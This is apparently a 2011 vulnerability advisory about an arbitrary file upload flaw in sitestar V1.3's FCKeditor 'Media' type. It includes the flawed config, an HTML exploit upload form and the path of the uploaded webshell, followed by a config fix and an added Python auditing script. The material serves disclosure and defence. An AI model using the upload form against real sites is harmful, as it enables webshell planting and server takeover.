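Release date: 2011-01-15
Author: udb311
Affected version: sitestar V1.3
Official site: http://www.sitestar.cn
Vulnerability type: file upload
Description: This vulnerability still exists in the FCK upload component; the program uses FCKeditor Version 2.0. Besides the vulnerability published by xiaocao that allows creating a folder named 1.ASP, a PHP script upload vulnerability is also present.
Keyword: withheld, to prevent mass exploitation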
Vulnerable file: /admin/fckeditor/upload/config.php

```php
<?php
// code omitted
// Due to security issues with Apache modules, it is recommended to leave the
// following setting enabled.
$Config['ForceSingleExtension'] = true ;
$Config['AllowedExtensions']['File'] = array() ;
$Config['DeniedExtensions']['File'] = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;
$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image'] = array() ;
$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
$Config['DeniedExtensions']['Flash'] = array() ;
?>
```

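Looking at the code, this is a modified FCKeditor configuration file. It places no restriction on the 'Media' type, so arbitrary files can be uploaded.
Test method:
The principle is the same as for Fckeditor 2.4.2.
http://www.hackline.net/a/news/ldfb/web/2009/1013/1005_2.html
Upload EXP: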

```html
<form id="frmUpload" enctype="multipart/form-data" action="http://www.hackline.net/admin/fckeditor//upload//upload.php?Type=Media" method="post">
  Upload a new file:<br>
  <input type="file" name="NewFile" size="50"><br>
  <input id="btnUpload" type="submit" value="Upload">
</form>
```

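Address of the uploaded shell:
http://<domain>/upload/media/eval.php
Screenshot as proof:
Fix: the same reasoning applies.
Modify the config file and restrict script execution permissions on the upload directory.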

```php
$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media'] = array() ;
```
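
To audit a config.php for the gap described above, here is an added example (not part of the original advisory and not sitestar or FCKeditor code) that parses the extension rules and reports resource types that would let script extensions through. It assumes that an empty or missing list imposes no restriction; `parse_config`, `is_accepted` and `audit` are hypothetical names, and the sample configs are constructed from the rules shown on this page.

```python
import re

# Resource types requested through ?Type= (assumption: the four named on this page).
TYPES = ("File", "Image", "Flash", "Media")
# Server-side script extensions to probe for (illustrative subset).
SCRIPT_EXTS = ("php", "phtml", "asp", "jsp", "cgi")

RULE = re.compile(
    r"\$Config\['(Allowed|Denied)Extensions'\]\['(\w+)'\]\s*=\s*array\((.*?)\)\s*;")

def parse_config(text):
    """Return {type: {'Allowed': [...], 'Denied': [...]}} from config.php text."""
    rules = {}
    for kind, rtype, body in RULE.findall(text):
        rules.setdefault(rtype, {})[kind] = re.findall(r"'([^']*)'", body.lower())
    return rules

def is_accepted(rules, rtype, ext):
    """Assumed check model: an empty or missing list imposes no restriction."""
    allowed = rules.get(rtype, {}).get("Allowed", [])
    denied = rules.get(rtype, {}).get("Denied", [])
    if allowed and ext not in allowed:
        return False
    return not (denied and ext in denied)

def audit(text):
    """Return (type, extension) pairs for script extensions the rules let through."""
    rules = parse_config(text)
    return [(t, e) for t in TYPES for e in SCRIPT_EXTS if is_accepted(rules, t, e)]

# Constructed sample: the rules from the advisory (File deny list abbreviated).
VULNERABLE = r"""
$Config['AllowedExtensions']['File'] = array() ;
$Config['DeniedExtensions']['File'] = array('php','phtml','asp','jsp','cgi') ;
$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image'] = array() ;
$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
$Config['DeniedExtensions']['Flash'] = array() ;
"""
# Same rules plus the two 'Media' lines from the fix.
FIXED = VULNERABLE + r"""
$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media'] = array() ;
"""

if __name__ == "__main__":
    print("vulnerable:", audit(VULNERABLE))
    print("fixed:     ", audit(FIXED))
```

An empty result means every audited type has a rule that rejects the probed script extensions; it says nothing about the web server's execution settings for the upload directory, which the fix also calls for.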